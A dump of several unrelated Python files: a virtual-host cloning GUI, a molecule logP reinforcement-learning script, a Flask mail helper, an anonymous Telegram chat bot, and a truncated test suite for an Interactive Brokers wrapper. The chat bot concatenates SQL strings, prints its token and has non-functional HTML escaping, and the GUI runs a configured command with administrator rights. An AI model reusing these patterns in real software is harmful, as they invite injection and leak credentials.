def iter_except(function, exception):
try:
while True:
yield function()
except exception:
return
class VirtualHostsGui:
devs = None
window = None
list = None
devName = None
devAlias = None
devUrl = None
repo = None
options = {}
homeDir = None
database = None
url = None
pathEntry = None
vh = None
text = None
cloneWindow = None
config_path = "/usr/local/etc/virtualhosts/config.ini"
current = None
def __init__(self):
self.homeDir = os.path.expanduser("~")
self.read_config()
if not self.options["devs_json_url"]:
print("Error: 'devs_json_url' not set in " + self.config_path)
exit(1)
self.devs = json.loads(urllib.urlopen(self.options["devs_json_url"]).read())["devs"]
self.devs.sort(key=self.handle_sort)
self.window = Tkinter.Tk()
self.window.title("VirtualHosts")
self.window.geometry("700x495")
self.window.resizable(0, 0)
ws = self.window.winfo_screenwidth()
hs = self.window.winfo_screenheight()
x = (ws / 2) - (700 / 2)
y = (hs / 2) - (495 / 2)
self.window.geometry('+%d+%d' % (x, y))
self.list = Listbox(self.window, width=20, height=29, font='Helvetica 14')
self.list.bind("<<ListboxSelect>>", self.on_select)
self.devName = StringVar()
self.devAlias = StringVar()
self.devUrl = StringVar()
self.database = StringVar()
self.url = StringVar()
self.repo = StringVar()
dev_name_label = Label(self.window, textvariable=self.devName, font='Helvetica 18 bold')
dev_alias_label = Label(self.window, textvariable=self.devAlias, font='Helvetica 16')
dev_url_label = Label(self.window, textvariable=self.devUrl, font='Helvetica 16')
config_path_label = Label(self.window, text=self.options["webroot_path"], font='Helvetica 14')
database_label = Label(self.window, textvariable=self.database, font='Helvetica 16')
url_label = Label(self.window, textvariable=self.url, font='Helvetica 16')
repo_label = Label(self.window, textvariable=self.repo, font='Helvetica 16')
self.pathEntry = Entry(self.window)
clone_button = Button(self.window, text="Clone", command=self.clone)
i = 0
for dev in self.devs:
self.list.insert(i, dev["name"])
i += 1
self.list.grid(row=0, column=0, rowspan=60)
dev_name_label.grid(row=0, column=1, sticky="W", columnspan=2)
dev_alias_label.grid(row=1, column=1, sticky="W", columnspan=2)
dev_url_label.grid(row=2, column=1, sticky="W", columnspan=2)
database_label.grid(row=3, column=1, sticky="W", columnspan=2)
url_label.grid(row=4, column=1, sticky="W", columnspan=2)
repo_label.grid(row=5, column=1, sticky="W", columnspan=2)
config_path_label.grid(row=59, column=1, sticky="E")
clone_button.grid(row=59, column=3, sticky="E")
self.pathEntry.grid(row=59, column=2, sticky="W")
self.window.mainloop()
def clone(self):
if not self.current:
return
self.cloneWindow = Tkinter.Tk()
self.cloneWindow.title("Cloning...")
self.cloneWindow.resizable(0, 0)
self.cloneWindow.geometry("500x300")
ws = self.cloneWindow.winfo_screenwidth()
hs = self.cloneWindow.winfo_screenheight()
x = (ws / 2) - (500 / 2)
y = (hs / 2) - (300 / 2)
self.cloneWindow.geometry('+%d+%d' % (x, y))
self.cloneWindow.protocol("WM_DELETE_WINDOW", self.quit)
self.text = Text(self.cloneWindow)
self.text.pack()
index = self.current
domain = self.devs[index]["alias"].replace("_", "-")
path = self.pathEntry.get().replace(" ", "_")
database = self.devs[index]["alias"]
repo = self.devs[index]["repo"]
alias = self.devs[index]["alias"]
dev_url = self.devs[index]["url"]
command = "vh create " + alias + " -d " + domain + " -p " + path + " -db " + database + " -cr " + repo + " -b -cd " + dev_url + " -i -sr"
self.vh = subprocess.Popen(command.split(), stdout=subprocess.PIPE, bufsize=1)
self.text.insert(INSERT, "Running '" + command + "'...\n")
q = Queue()
t = Thread(target=self.reader_thread, args=[q])
t.daemon = True
t.start()
self.update(q)
self.cloneWindow.mainloop()
def quit(self):
self.vh.kill()
os.system("osascript -e 'do shell script \"" + self.options["apache_reload_command"] + "\" with administrator privileges'")
self.cloneWindow.destroy()
def update(self, q):
for line in iter_except(q.get_nowait, Empty):
if line is None:
self.quit()
return
else:
self.text.insert(INSERT, line)
break
self.cloneWindow.after(40, self.update, q)
def reader_thread(self, q):
try:
for line in iter(self.vh.stdout.readline, b''):
q.put(line)
self.vh.stdout.close()
finally:
q.put(None)
def on_select(self, e):
w = e.widget
index = int(w.curselection()[0])
self.devName.set("Name: " + self.devs[index]["name"])
self.devAlias.set("Alias: " + self.devs[index]["alias"])
self.devUrl.set("Dev URL: http://" + self.devs[index]["url"])
self.database.set("Database: " + self.devs[index]["alias"])
self.repo.set("Repo: " + self.devs[index]["repo"])
self.url.set("Local URL: http://" + self.devs[index]["alias"].replace("_", "-") + ".lo")
self.pathEntry.delete(0, len(self.pathEntry.get()))
self.pathEntry.insert(0, self.devs[index]["alias"])
self.current = index
def handle_sort(self, elem):
return elem["name"]
def read_config(self):
config = ConfigParser.RawConfigParser()
config.read(self.config_path)
self.options["webroot_path"] = config.get("General", "webroot_path")
self.options["apache_reload_command"] = config.get("General", "apache_reload_command")
self.options["devs_json_url"] = config.get("General", "devs_json_url")
self.options["webroot_path"] = self.options["webroot_path"].replace("%HOME_DIR%", self.homeDir)
VirtualHostsGui()
|
optimize_logp.py
|
""" Optimize the logP of a molecule
Starting point: methane (C)
- actions: add a bond or an atom
- state: molecule state
- reward: 0, unless a terminal state is reached, then the penalized logp estimate of the molecule
"""
import argparse
import logging
import math
import multiprocessing
import os
import sys
import time
import networkx as nx
import rdkit
from rdkit import Chem, RDConfig
from rdkit.Chem import Descriptors
# from rdkit.Contrib import SA_Score
sys.path.append(os.path.join(RDConfig.RDContribDir, 'SA_Score'))
# noinspection PyUnresolvedReferences
import sascorer
from rlmolecule.sql.run_config import RunConfig
from examples.qed.optimize_qed import construct_problem
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
# copied from here: https://github.com/google-research/google-research/blob/master/mol_dqn/experimental/optimize_logp.py
# Zhou et al., Optimization of Molecules via Deep Reinforcement Learning. Scientific Reports 2019
def num_long_cycles(mol):
"""Calculate the number of long cycles.
Args:
mol: Molecule. A molecule.
Returns:
negative cycle length.
"""
cycle_list = nx.cycle_basis(nx.Graph(Chem.rdmolops.GetAdjacencyMatrix(mol)))
if len(cycle_list) == 0:
cycle_length = 0
else:
cycle_length = max([len(j) for j in cycle_list])
if cycle_length <= 6:
cycle_length = 0
else:
cycle_length = cycle_length - 6
return -cycle_length
def penalized_logp(molecule):
log_p = Descriptors.MolLogP(molecule)
sas_score = sascorer.calculateScore(molecule)
cycle_score = num_long_cycles(molecule)
return log_p - sas_score + cycle_score
# copied from here: https://github.com/dbkgroup/prop_gen/blob/d17d935a534b6a667d2603b4d0c7b4add446d6bf/gym-molecule/gym_molecule/envs/molecule.py
# Khemchandani et al., DeepGraphMolGen [...]. J. Cheminform 2020
def reward_penalized_log_p(mol):
"""
Reward that consists of log p penalized by SA and # long cycles,
as described in (Kusner et al. 2017). Scores are normalized based on the
statistics of 250k_rndm_zinc_drugs_clean.smi dataset
:param mol: rdkit mol object
:return: float
"""
# normalization constants, statistics from 250k_rndm_zinc_drugs_clean.smi
logP_mean = 2.4570953396190123
logP_std = 1.434324401111988
SA_mean = -3.0525811293166134
SA_std = 0.8335207024513095
cycle_mean = -0.0485696876403053
cycle_std = 0.2860212110245455
log_p = Descriptors.MolLogP(mol)
SA = -sascorer.calculateScore(mol)
cycle_score = num_long_cycles(mol)
normalized_log_p = (log_p - logP_mean) / logP_std
normalized_SA = (SA - SA_mean) / SA_std
normalized_cycle = (cycle_score - cycle_mean) / cycle_std
return normalized_log_p + normalized_SA + normalized_cycle
def construct_problem(run_config):
# We have to delay all importing of tensorflow until the child processes launch,
# see https://github.com/tensorflow/tensorflow/issues/8220. We should be more careful about where / when we
# import tensorflow, especially if there's a chance we'll use tf.serving to do the policy / reward evaluations on
# the workers. Might require upstream changes to nfp as well.
from rlmolecule.tree_search.reward import RankedRewardFactory
from rlmolecule.tree_search.reward import LinearBoundedRewardFactory
from rlmolecule.molecule.molecule_problem import MoleculeTFAlphaZeroProblem
from rlmolecule.molecule.molecule_state import MoleculeState
from rlmolecule.molecule.builder.builder import MoleculeBuilder
class PenLogPOptimizationProblem(MoleculeTFAlphaZeroProblem):
def get_initial_state(self) -> MoleculeState:
return MoleculeState(rdkit.Chem.MolFromSmiles('C'), self._config)
def get_reward(self, state: MoleculeState) -> (float, {}):
if state.forced_terminal:
return reward_penalized_log_p(state.molecule), {'forced_terminal': True, 'smiles': state.smiles}
return 0.0, {'forced_terminal': False, 'smiles': state.smiles}
prob_config = run_config.problem_config
builder = MoleculeBuilder(
max_atoms=prob_config.get('max_atoms', 25),
min_atoms=prob_config.get('min_atoms', 1),
try_embedding=prob_config.get('tryEmbedding', True),
sa_score_threshold=prob_config.get('sa_score_threshold', 4),
stereoisomers=prob_config.get('stereoisomers', False),
atom_additions=prob_config.get('atom_additions', ('C', 'N', 'O'))
)
engine = run_config.start_engine()
run_id = run_config.run_id
train_config = run_config.train_config
if train_config.get('linear_reward'):
reward_factory = LinearBoundedRewardFactory(min_reward=train_config.get('min_reward', 0),
max_reward=train_config.get('max_reward', 20))
else:
reward_factory = RankedRewardFactory(
engine=engine,
run_id=run_id,
reward_buffer_min_size=train_config.get('reward_buffer_min_size', 10),
reward_buffer_max_size=train_config.get('reward_buffer_max_size', 50),
ranked_reward_alpha=train_config.get('ranked_reward_alpha', 0.75)
)
problem = PenLogPOptimizationProblem(
engine,
builder,
run_id=run_id,
reward_class=reward_factory,
num_messages=train_config.get('num_messages', 1),
num_heads=train_config.get('num_heads', 2),
features=train_config.get('features', 8),
max_buffer_size=train_config.get('max_buffer_size', 200),
min_buffer_size=train_config.get('min_buffer_size', 15),
batch_size=train_config.get('batch_size', 32),
policy_checkpoint_dir=train_config.get(
'policy_checkpoint_dir', 'policy_checkpoints')
)
return problem
def run_games(run_config):
from rlmolecule.alphazero.alphazero import AlphaZero
config = run_config.mcts_config
game = AlphaZero(
construct_problem(run_config),
min_reward=config.get('min_reward', 0.0),
pb_c_base=config.get('pb_c_base', 1.0),
pb_c_init=config.get('pb_c_init', 1.25),
dirichlet_noise=config.get('dirichlet_noise', True),
dirichlet_alpha=config.get('dirichlet_alpha', 1.0),
dirichlet_x=config.get('dirichlet_x', 0.25),
# MCTS parameters
ucb_constant=config.get('ucb_constant', math.sqrt(2)),
)
while True:
path, reward = game.run(
num_mcts_samples=config.get('num_mcts_samples', 50),
max_depth=config.get('max_depth', 1000000),
)
logger.info(f'Game Finished -- Reward {reward.raw_reward:.3f} -- Final state {path[-1][0]}')
def train_model(run_config):
config = run_config.train_config
construct_problem(run_config).train_policy_model(
steps_per_epoch=config.get('steps_per_epoch', 100),
lr=float(config.get('lr', 1E-3)),
epochs=int(float(config.get('epochs', 1E4))),
game_count_delay=config.get('game_count_delay', 20),
verbose=config.get('verbose', 2)
)
def monitor(run_config):
from rlmolecule.sql.tables import RewardStore
problem = construct_problem(run_config)
while True:
best_reward = problem.session.query(RewardStore) \
.filter_by(run_id=problem.run_id) \
.order_by(RewardStore.reward.desc()).first()
num_games = len(list(problem.iter_recent_games()))
if best_reward:
print(f"Best Reward: {best_reward.reward:.3f} for molecule "
f"{best_reward.data['smiles']} with {num_games} games played")
time.sleep(5)
def setup_argparser():
parser = argparse.ArgumentParser(
description='Run the Penalized LogP optimization. Default is to run the script locally')
parser.add_argument('--config', type=str,
help='Configuration file')
parser.add_argument('--train-policy', action="store_true", default=False,
help='Train the policy model only (on GPUs)')
parser.add_argument('--rollout', action="store_true", default=False,
help='Run the game simulations only (on CPUs)')
return parser
if __name__ == "__main__":
parser = setup_argparser()
args = parser.parse_args()
run_config = RunConfig(args.config)
if args.train_policy:
train_model(run_config)
elif args.rollout:
# make sure the rollouts do not use the GPU
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
run_games(run_config)
else:
jobs = [multiprocessing.Process(target=monitor, args=(run_config,))]
jobs[0].start()
time.sleep(1)
for i in range(5):
jobs += [multiprocessing.Process(target=run_games, args=(run_config,))]
jobs += [multiprocessing.Process(target=train_model, args=(run_config,))]
for job in jobs[1:]:
job.start()
for job in jobs:
job.join(300)
|
emails.py
|
#!usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author:Administrator
@file: emails.py
@time: 2019/06/05
@software: PyCharm
@detail: 邮件
"""
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from albumy.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['ALBUMY_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
app = current_app._get_current_object()
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_confirm_email(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
|
makebot.py
|
#!/usr/bin/env python3
# -*- coding: utf8 -*-
# Made by Make http://github.com/mak3e
#
# Imports
from telegram.ext import Updater, CommandHandler, MessageHandler # python-telegram-bot
from threading import Thread
from datetime import datetime
import threading
import sqlite3
import animals
import subprocess
import time
# Variables
ids = []
token = "" # Bot token here
token = open("TOKEN").read().split("\n")[0]
print(token)
if not token:
raise ValueError('please add token')
todo = [] # Used for storing send jobs
conn = sqlite3.connect('data.db', check_same_thread=False, isolation_level=None) # Init sqlite db
c = conn.cursor() # Database cursor
lock = threading.Lock() # Lock used for threading
custom_names = {1: "admin"} # Used for special names
# Strings
bot_name = "BOT" # Bot name show in bot messages
with open("BUILD", "r") as f:
build = f.read() # Get build number from BUILD file
version = "0.3_" + str(build) # Version is version+build
author = "Make" # Author
help_text = "Untergrund Chat @TheVillageChats Chat-Netzwerks.\n\nHier kannst du Anonym mit anderen schreiben.\n\n/help - Help\n/license - Shows the license\n/info - Information about your identity and the server\n/renew - Renews your identity\n/stop - Stops the bot"
license_text = "The Bot is hosted by @GeloMyrtol. It's free software (like in freedom not in free beer) and is available under MIT license at https://github.com/Bergiu/makebot."
welcome_text = "Welcome to the chatbot! Say hello to everyone! Made by {{author}}!" # Shown for new users
stats_text = "Chat info\nYour name: {{name}}\nCurrent room: {{room}}\nTotal users: {{users}}\nVersion {{version}}" # Statistic text
name_text = "Your new ID is {{name}}" # Shown for users renewing their identity
room_text = "Rooms\nYou can join rooms using /join room\n{{rooms}}" # Not implemented
commit_msg = subprocess.check_output(['git', 'log', '-1', '--pretty=%B']).decode("utf-8")
update_text = "Chatbot updated to version {{version}}\nUpdate notes:\n+" + commit_msg # Text shown when bot is run
unknown_text = "Unknown command!" # Text shown when unknown command is typed
exit_text = "Bye bye {{name}}! You can always come back by using /start" # Text shown when /stop is used
# main
def main():
updater = Updater(token) # Updater, check python-telegram-bot docs
dispatcher = updater.dispatcher # Dispatcher, check ptb docs
dispatcher.add_handler(CommandHandler('help', help)) # help command
dispatcher.add_handler(CommandHandler('license', license)) # license command
dispatcher.add_handler(CommandHandler('start', start)) # define start command
dispatcher.add_handler(CommandHandler('renew', renew)) # same for renew
dispatcher.add_handler(CommandHandler('info', info)) # same for info
dispatcher.add_handler(CommandHandler('rooms', rooms)) # experimental and not implemented
dispatcher.add_handler(MessageHandler([], message)) # message handler
dispatcher.add_handler(CommandHandler('stop', stop)) # define stop command
# dispatcher.addUnknownTelegramCommandHandler(unknown) # used for unknown commands
Thread(target=process).start() # initialize process thread
queue(Thread(target=send, args=(updater.bot, bot_name, send_text, 1, 0, update_text,))) # add send update_text job to queue
updater.start_polling() # start polling for messages
updater.idle() # idle
# todo worker
def process():
while 1: # forever
time.sleep(1)
if len(todo) > 0: # if there is jobs in todo list
try:
todo[0].start() # try to start a job
todo.pop(0) # and remove it from queue
except Exception:
pass # if job cannot be started this time (this will happen) try again
# queue
def queue(action):
todo.append(action) # and Thread object (job) to todo list
def sql(query, ret=0): # sql query parsing helper
try:
lock.acquire(True) # use lock (otherwise threading and sqlite dont work together)
c.execute(query) # exec query
if ret: # if return flag is set
return c.fetchall() # return stuff
finally:
lock.release() # release the lock
# use this for logging
def log(message): # log a message to log file
log_text = str(datetime.now()) + ": " + message + "\n"
with open("log", "a") as f:
f.write(log_text)
# /help
def help(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, help_text,))) # send help text
# /license
def license(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, license_text,))) # send license text
# /start
def start(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, welcome_text,))) # send welcome text
if update.message.chat_id not in ids: # if user is not in database add it using renew function
renew(bot, update)
# /renew - Get new public ID
def renew(bot, update):
user_type = 0 # not implemented
room = 0 # not implemented
data = sql("SELECT user_type, room FROM 'users' WHERE telegram_id=" + str(update.message.chat_id), 1) # not implemented
remove(update.message.chat_id) # remove old database entry if exists (renew user id)
if len(data) > 0:
if len(data[0]) > 0:
user_type = data[0][0] # not implemented
room = data[0][1] # not implemented
sql("INSERT INTO 'users' ('telegram_id', 'user_type', 'room') VALUES(" + str(update.message.chat_id) + ", " + str(user_type) + ", " + str(room) + ")") # add user to database
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, name_text,))) # send name_text to user
# /stats - Show some statistics
def info(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, stats_text,))) # send stats_text to user
# /rooms - Show rooms
def rooms(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, room_text,))) # not implemented (but works)
# /stop - Stop recieving messages
def stop(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, exit_text,))) # send exit_text to user
remove(update.message.chat_id)
# any message - Send messages to other users
def message(bot, update):
if get_name(update.message.chat_id) == 0: # if sender not in database, add it
renew(bot, update)
if update.message.photo: # if message contains something send it as something to all other users (add job to queue)
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_photo, 1, update.message.chat_id, update.message.caption, get_room(update.message.chat_id), update.message.photo[0].file_id,)))
elif update.message.sticker:
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_sticker, 1, update.message.chat_id, "", get_room(update.message.chat_id), update.message.sticker.file_id,)))
elif update.message.video:
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_video, 1, update.message.chat_id, update.message.caption, get_room(update.message.chat_id), update.message.video.file_id,)))
elif update.message.audio:
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_audio, 1, update.message.chat_id, "", get_room(update.message.chat_id), update.message.audio.file_id,)))
elif update.message.document:
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_document, 1, update.message.chat_id, update.message.document.file_name, get_room(update.message.chat_id), update.message.document.file_id,)))
else:
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_text, 1, update.message.chat_id, update.message.text, get_room(update.message.chat_id),)))
# optimized sending
def send(bot, name, send_type, mode=0, source_id=0, text="", room=0, file=0):
print("sent")
# modes 0=to everyone, 1=to everyone but source_id, 2= to source_id (must exist)
text = manipulate(text, get_name(source_id), room) # apply filters to the message
message_type = "message" # was implemented for logging purposes, all messages are now just "message"
log(name + ": (" + message_type + ")\n" + text) # log message
if mode != 2: # if mode is not 2 send message to everyone or to everyone else than sender
for target_id in sql("SELECT telegram_id FROM 'users' WHERE room=" + str(room), 1):
print(target_id)
if target_id[0] != source_id or mode == 0: # send to all but the sender
queue(Thread(target=send_type, args=(bot, target_id[0], name, file, text,))) # add send message to queue
else:
send_text(bot, source_id, name, file, text)
# functions used for sending messages
# send text message
def send_text(bot, target_id, name, ignore, message):
try:
bot.sendMessage(chat_id=target_id, text=(bold(name) + ":\n" + message), parse_mode="HTML")
except Exception as e:
send_error(target_id, name, e, "t")
pass
# send photo
def send_photo(bot, target_id, name, photo, caption):
try:
bot.sendPhoto(chat_id=target_id, photo=str(photo), caption=caption + " " + name)
except Exception as e:
send_error(target_id, name, e, "p")
pass
# send sticker
def send_sticker(bot, target_id, name, sticker, ignore):
try:
bot.sendSticker(chat_id=target_id, sticker=str(sticker))
except Exception as e:
send_error(target_id, name, e, "s")
pass
# send video
def send_video(bot, target_id, name, video, caption):
try:
bot.sendVideo(chat_id=target_id, video=str(video), caption=caption)
except Exception as e:
send_error(target_id, name, e, "v")
pass
# send audio
def send_audio(bot, target_id, name, audio, ignore):
try:
bot.sendAudio(chat_id=target_id, audio=str(audio), performer=name)
except Exception as e:
send_error(target_id, name, e, "a")
pass
# send document
def send_document(bot, target_id, name, document, filename):
try:
bot.sendDocument(chat_id=target_id, document=document, filename=filename)
except Exception as e:
send_error(target_id, name, e, "d")
pass
# handle errors in sending, remove target if error type is Unauthorized
def send_error(target_id, name, e, t):
log("Error: " + name + " -[" + t + "]-> " + str(get_name(target_id)) + ": " + str(e))
if "Unauthorized" in str(e):
remove(target_id)
# bold fuction
def bold(string):
return "<b>" + string + "</b>"
# manipulate
def manipulate(text, name="", room_id=0):
# replace tags with names and fix possible html characters in message
count = sql("SELECT Count(*) FROM 'users'", 1)[0][0]
room = sql("SELECT name FROM 'rooms' WHERE id=" + str(room_id), 1)[0][0]
placeholders = {"&": "&", "{{author}}": author, "{{name}}": name, "{{room}}": room, "{{users}}": count, "{{version}}": version, "<": "<", ">": ">"}
for placeholder in placeholders:
s1 = str(placeholder)
s2 = str(placeholders[placeholder])
text = text.replace(s1, s2)
return text
# Unknown command
def unknown(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, unknown_text,)))
# get name using animals script
def get_name(telegram_id):
user_id = get_id(telegram_id)
if user_id in custom_names:
return custom_names[user_id].capitalize()
return animals.get_name(user_id) + " #" + str(user_id)
# get id from database
def get_id(telegram_id):
try:
ids = sql("SELECT id FROM 'users' WHERE telegram_id=" + str(telegram_id), 1)
if len(ids) > 0:
return int(ids[0][0])
else:
return 0
except Exception:
return -1
# get room (rooms are not implemented)
def get_room(telegram_id):
return sql("SELECT room FROM 'users' WHERE telegram_id=" + str(telegram_id), 1)[0][0]
# remove user from db
def remove(telegram_id):
sql("DELETE FROM 'users' WHERE telegram_id=" + str(telegram_id))
if __name__ == "__main__":
main()
|
test_wrapper.py
|
"""Unit tests for module `ibpy_native._internal._wrapper`."""
# pylint: disable=protected-access
import asyncio
import datetime
import threading
import unittest
from ibapi import contract
from ibapi import wrapper
from ibpy_native import error
from ibpy_native import models
from ibpy_native import manager
from ibpy_native._internal import _client
from ibpy_native._internal import _global
from ibpy_native._internal import _wrapper
from ibpy_native.utils import datatype
from ibpy_native.utils import finishable_queue as fq
from tests.toolkit import sample_contracts
from tests.toolkit import sample_orders
from tests.toolkit import utils
class TestGeneral(unittest.TestCase):
"""Unit tests for general/uncategorised things in `IBWrapper`.
* Connection with IB is NOT required.
"""
def setUp(self):
self._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
def test_set_on_notify_listener(self):
"""Test setter `set_on_notify_listener` & overridden function `error`
for the delivery of IB system notification.
* Expect to receive IB's system notification (`reqId` -1) once the
notification listener is set.
"""
code = 1001
msg = "MOCK MSG"
listener = utils.MockNotificationListener()
self._wrapper.set_on_notify_listener(listener)
# Mock IB system notification
self._wrapper.error(reqId=-1, errorCode=code, errorString=msg)
# Notification should have received by the notification listener
self.assertEqual(listener.msg_code, code)
self.assertEqual(listener.msg, msg)
@utils.async_test
async def test_error(self):
"""Test overridden function `error`."""
req_id = 1
code = 404
msg = "ERROR"
# Prepare request queue
queue = self._wrapper.get_request_queue(req_id)
# Mock IB error
self._wrapper.error(reqId=req_id, errorCode=code, errorString=msg)
queue.put(element=fq.Status.FINISHED)
result = await queue.get()
# Expect exception of `IBError` to be sent to corresponding request
# queue.
self.assertIsInstance(result[0], error.IBError)
self.assertEqual(result[0].err_code, code)
self.assertEqual(result[0].err_str, msg)
class TestConnectionEvents(unittest.TestCase):
"""Unit tests for connection events related mechanism implemented in
`IBWrapper`.
* Connection with IB is NOT REQUIRED.
"""
def setUp(self):
self._listener = utils.MockConnectionListener()
self._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager(),
connection_listener=self._listener
)
def test_on_connected(self):
"""Test the event of connection established."""
# Mock the behaviour of initial handshake callback once the connection
# is made.
self._wrapper.nextValidId(orderId=1)
self.assertTrue(self._listener.connected)
def test_on_disconnected(self):
"""Test the event of connection dropped."""
# Mock the `NOT_CONNECTED` error is returned to `error` callback
self._wrapper.error(reqId=-1, errorCode=error.IBErrorCode.NOT_CONNECTED,
errorString=_global.MSG_NOT_CONNECTED)
self.assertFalse(self._listener.connected)
class TestReqQueue(unittest.TestCase):
"""Unit tests for `_req_queue` related mechanicisms in `IBWrapper`.
Connection with IB is NOT required.
"""
def setUp(self):
self._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
self._init_id = utils.IB_CLIENT_ID * 1000
def test_next_req_id_0(self):
"""Test property `next_req_id` for retrieval of next usable
request ID.
* No ID has been occupied yet.
"""
# 1st available request ID should always be initial request ID
self.assertEqual(self._wrapper.next_req_id, self._init_id)
def test_next_req_id_1(self):
"""Test property `next_req_id` for retrieval of next usable
request ID.
* Initial request ID has already been occupied.
"""
# Occupy request ID `CLIENT_ID * 1000`
self._wrapper.get_request_queue(req_id=self._init_id)
# Next available request ID should be `CLIENT_ID * 1000 + 1`
self.assertEqual(self._wrapper.next_req_id, self._init_id + 1)
@utils.async_test
async def test_next_req_id_2(self):
"""Test property `next_req_id` for retrieval of next usable
request ID.
* Initial request ID was occupied but released for reuse.
"""
# Occupy initial request ID
queue = self._wrapper.get_request_queue(req_id=self._init_id)
# Release initial request ID by marking the queue associated as FINISHED
queue.put(element=fq.Status.FINISHED)
await queue.get()
# Next available request ID should reuse initial request ID
self.assertEqual(self._wrapper.next_req_id, self._init_id)
def test_get_request_queue_0(self):
"""Test getter `get_request_queue`."""
try:
self._wrapper.get_request_queue(req_id=1)
except error.IBError:
self.fail("IBError raised unexpectedly.")
@utils.async_test
async def test_get_request_queue_1(self):
"""Test getter `get_request_queue`.
* Queue associated with ID 1 has already been initialised and available
for reuse. Should return the same `FinishableQueue` instance.
"""
# Prepare queue with request ID 1
queue = self._wrapper.get_request_queue(req_id=1)
queue.put(element=fq.Status.FINISHED)
await queue.get()
# Should return the same `FinishableQueue` instance for reuse
self.assertEqual(self._wrapper.get_request_queue(req_id=1), queue)
def test_get_request_queue_err(self):
"""Test getter `get_request_queue` for error case.
* Queue associated with ID 1 has already been initialised and NOT
ready for reuse. Should raise exception `IBError`.
"""
# Prepare queue with request ID 1
self._wrapper.get_request_queue(req_id=1)
# Expect exception `IBError`
with self.assertRaises(error.IBError):
self._wrapper.get_request_queue(req_id=1)
def test_get_request_queue_no_throw_0(self):
"""Test getter `get_request_queue_no_throw`.
* No queue has been initialised before. Should return `None`.
"""
self.assertEqual(self._wrapper.get_request_queue_no_throw(req_id=1),
None)
def test_get_request_queue_no_throw_1(self):
"""Test getter `get_request_queue_no_throw`.
* Queue associated with ID 1 has already been initialised. Should
return the same `FinishableQueue` instance even if it's not ready for
reuse yet.
"""
# Prepare queue with request ID 1
queue = self._wrapper.get_request_queue(req_id=1)
# Expect the same `FinishableQueue` instance.
self.assertEqual(self._wrapper.get_request_queue_no_throw(req_id=1),
queue)
class TestAccountAndPortfolio(unittest.TestCase):
"""Unit tests for account and portfolio data related functions in
`IBWrapper`.
Connection with IB is NOT required.
"""
def setUp(self):
self._delegate = utils.MockAccountsManagementDelegate()
self._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=self._delegate,
orders_manager=manager.OrdersManager()
)
def test_managed_accounts(self):
"""Test overridden function `managedAccounts`."""
# Mock accounts list received from IB
acc_1 = "DU0000140"
acc_2 = "DU0000141"
# IB accounts list format "DU0000140,DU0000141,..."
self._wrapper.managedAccounts(accountsList=f"{acc_1},{acc_2}")
# Expect instances of model `Accounts` for `acc_1` & `acc_2`
# to be stored in the `AccountsManagementDelegate` instance.
self.assertTrue(self._delegate.accounts)
self.assertTrue(acc_1 in self._delegate.accounts)
self.assertTrue(acc_2 in self._delegate.accounts)
@utils.async_test
async def test_update_account_value(self):
"""Test overridden function `updateAccountValue`."""
# Mock account value data received from IB
self._wrapper.updateAccountValue(
key="AvailableFunds", val="890622.47",
currency="USD", accountName="DU0000140"
)
self._delegate.account_updates_queue.put(element=fq.Status.FINISHED)
result = await self._delegate.account_updates_queue.get()
# Expect instance of `RawAccountValueData` in `account_updates_queue`
self.assertIsInstance(result[0], models.RawAccountValueData)
@utils.async_test
async def test_update_portfolio(self):
"""Test overridden function `updatePortfolio`."""
# Mock portfolio data received from IB
self._wrapper.updatePortfolio(
contract=sample_contracts.gbp_usd_fx(), position=1000,
marketPrice=1.38220, marketValue=1382.2, averageCost=1.33327,
unrealizedPNL=48.93, realizedPNL=0, accountName="DU0000140"
)
self._delegate.account_updates_queue.put(element=fq.Status.FINISHED)
results = await self._delegate.account_updates_queue.get()
# Expect instance of `RawPortfolioData` in `account_updates_queue`
self.assertIsInstance(results[0], models.RawPortfolioData)
@utils.async_test
async def test_update_account_time(self):
"""Test overridden function `updateAccountTime`."""
# Mock last update system time received from IB
time = "09:30"
self._wrapper.updateAccountTime(timeStamp=time)
self._delegate.account_updates_queue.put(element=fq.Status.FINISHED)
results = await self._delegate.account_updates_queue.get()
# Expect data stored as-is in `account_updates_queue`
self.assertEqual(results[0], time)
class TestOrder(unittest.TestCase):
"""Unit tests for IB order related functions & properties in `IBWrapper`.
Connection with IB is REQUIRED.
"""
@classmethod
def setUpClass(cls):
cls._wrapper = _wrapper.IBWrapper(
